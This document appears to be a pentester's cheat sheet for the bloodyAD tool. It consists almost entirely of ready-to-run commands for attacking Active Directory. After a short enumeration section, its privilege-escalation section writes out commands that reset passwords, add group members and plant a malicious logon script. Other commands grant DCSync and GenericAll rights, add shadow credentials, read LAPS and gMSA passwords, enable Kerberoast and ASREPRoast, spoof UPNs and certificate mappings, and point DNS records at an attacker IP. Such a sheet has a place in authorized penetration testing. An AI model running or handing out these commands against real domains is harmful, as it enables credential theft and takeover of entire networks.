Latest Windows and Linux versions can be downloaded from here.
New techniques can be found on this Twitter profile.
Official wiki.
Enumeration
Check user:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_USER'Check groups:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'Domain Admins'Check objects, type can be a container too:
bloodyAD --host $IP -d domain.local -u username -p 'password' get children 'DC=domain,DC=local' --type computerPassword policy check:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'DC=domain,DC=local' --attr minPwdLengthUAC check:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_USER' --attr userAccountControlChange password:
bloodyAD --host $IP -d domain.local -u username -p 'password' set password 'TARGET_USER' 'Password123'Check all attributes that can be changed, useful in combinations with --include-del parameter:
bloodyAD --host $IP -d domain.local -u username -p 'password' get writable --detailCheck OU’s that can be changed:
bloodyAD --host $IP -d domain.local -u username -p 'password' get writable --otype OUMachine account quota check:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuotabloodyAD --host $IP -d domain.local -u username -p 'password' set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10LDAP queries:
bloodyAD --host $IP -d domain.local -u username -p 'password' msldap -hPrivilege Escalation
Add user to the group:
bloodyAD --host $IP -d domain.local -u username -p 'password' add groupMember 'TARGET_GROUP' 'TARGET_USER'Set malicious logon script:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' scriptpath -v '\\$IP\malicious.bat'Set SPN, for Kerberoast or RBCD:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' servicePrincipalName -v 'cifs/service'Set delegation:
bloodyAD --host $IP -d domain.local -u username -p 'password' add uac 'TARGET_USER' -f TRUSTED_TO_AUTH_FOR_DELEGATIONSet user as owner:
bloodyAD --host $IP -d domain.local -u username -p 'password' set owner 'TARGET_GROUP' 'TARGET_USER'Set GenericAll privileges:
bloodyAD --host $IP -d domain.local -u username -p 'password' add genericAll $DN 'TARGET_USER'Shadow credentials:
bloodyAD --host $IP -d domain.local -u username -p 'password' add shadowCredentials 'TARGET_USER'Change account status:
bloodyAD --host $IP -d domain.local -u username -p 'password' remove uac 'TARGET_USER' -f ACCOUNTDISABLEChange account status, for ASREPRoast:
bloodyAD --host $IP -d domain.local -u username -p 'password' add uac 'TARGET_USER' DONT_REQ_PREAUTHRead gMSA password:
bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_SERVICE' --attr msDS-ManagedPasswordRead LAPS password:
bloodyAD --host $IP -d domain.local -u username -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtimeUPN spoofing, it can be changed for any attribute:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' mail -v 'administrator@domain.local'bloodyAD --host $IP -d domain.local -u username -p 'password' get object 'TARGET_USER' --attr userPrincipalNameESC14, scenario B:
bloodyAD --host $IP -d domain.local -u username -p 'password' set object 'TARGET_USER' altSecurityIdentities -v 'X509:<RFC822><username@domain.local>'Set DCSync rights on object, it can also be used for users:
bloodyAD --host $IP -d domain.local -u username -p 'password' add dcsync 'TARGET_OBJECT'DNS spoofing:
bloodyAD --host $IP -d domain.local -u username -p 'password' add dnsRecord 'TARGET_RECORD' $ATTACKER_IPVulnerability check for Windows Server 2025:
bloodyAD --host $IP -d domain.local -u username -p 'password' add badSuccessor PENTESTCheck tombstoned, recycled or deleted objects:
bloodyAD --host $IP -u username -d domain.local -p 'password' get search -c 1.2.840.113556.1.4.2064 --resolve-sd --attr ntsecuritydescriptor --base 'CN=Deleted Objects,DC=domain,DC=local' --filter "(objectClass=container)"